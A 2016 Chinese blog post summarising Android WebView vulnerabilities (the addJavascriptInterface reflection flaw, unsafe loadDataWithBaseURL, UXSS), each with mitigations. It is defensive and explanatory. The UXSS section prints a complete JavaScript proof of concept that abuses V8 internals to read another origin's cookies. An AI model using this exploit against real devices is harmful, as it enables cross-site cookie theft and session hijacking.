Android WebView 安全问题汇总

原文链接:http://mp.weixin.qq.com/s?__biz=MzAwODE1NTI2MQ==&mid=2247483666&idx=1&sn=81d4756018313ad19124152958b1d18d&chksm=9b727800ac05f116d3f45202ca0af2c2ee7024f49f0d34b1b217885a2792a1d4a03614f4bbbe#rd

一、addJavscriptInterface接口注入JS对象漏洞

问题描述

在使用WebView开发时注入JS对象,当App具有读写SDCARD权限,那么注入的JS对象就可以通过反射机制获取到Java对象Runtime,并调用静态方法来执行一些命令,如读写文件命令等。

解决方案

  1. Google在4.2以上系统已经修复。 即使用@JavascriptInterface注解来声明JS访问的方法。

  2. 对于4.2以下系统可以参考这个开源项目safe-java-js-webview-bridge

  3. 删除Android系统内部注入的JS对象

    webView.removeJavascriptInterface("searchBoxJavaBridge_");//android 4.2以下google默认添加的
    webView.removeJavascriptInterface("accessibility");  

    webView.removeJavascriptInterface("accessibilityTraversal");

二、WebView API不安全使用(阿里聚安全)

Webview中可以用loadDataWithBaseURL加载一段html代码,函数原型如下: loadDataWithBaseUrl(String baseUrl, String data, String mimeType, String encoding, String historyUrl)。其中,baseUrl为默认的html代码,data为要加载的 html代码,mimeType为文本类型,encoding为编码格式,historyUrl为历史记录的html代码。如果baseUrl和data可控,则可让app加载指定的攻击html进行攻击。

攻击演示:某app对loadDataWithBaseURL函数使用不当,恶意app可用该漏洞获取Databases目录下webview.db文件。

 

解决方案:

1. baseUrl和data不要让用户可控。
2. 禁止File域下执行js。

三、uxss(通用xss跨站脚本)漏洞

Uxss(Universal Cross-Site Scripting通用型XSS)UXSS是一种利用浏览器或者浏览器扩展漏洞来制造产生XSS的条件并执行代码的一种攻击类型。可以到达浏览器全局远程执行命令、绕过同源策略、窃取用户资料以及劫持用户的严重危害。

 

<script>

frame = document.body.appendChild(document.createElement("iframe"));

frame.src = "http://m.baidu.com/";

frame.onload = function() {

Function("}, (builtins = this), function() {");

originalInstantiate = builtins.Instantiate;

builtins.DefineOneShotAccessor(builtins, "Instantiate", function() {});

flag = 0;

template = null;

builtins.Instantiate = function(x, y) {

if(flag) {

doc = frame.contentWindow.document;

alert(doc.cookie);

flag = 0;

} else if(!template)

template = x;

return originalInstantiate(x, y);

};

document.implementation;

flag = 1;

builtins.ConfigureTemplateInstance(frame.contentWindow, template);

}

</script>

 

测试结果(成功跨域读取目标m.baidu.com)的cookie信息


修复建议

    1. 服务端禁止iframe嵌套X-FRAME-OPTIONS:DENY。  2. 客户端使用setAllowFileAccess(false)方法禁止webview访问本地域。详见:setAllowFileAccess(boolean)

    2. 客户端使用onPageStarted (WebView view, String url, Bitmap favicon)方法在跳转前进行跨域判断。

    3. 客户端对iframe object标签属性进行过滤。

posted @ 2016-09-25 21:23  hylinux1024  阅读(709)  评论(0编辑  收藏  举报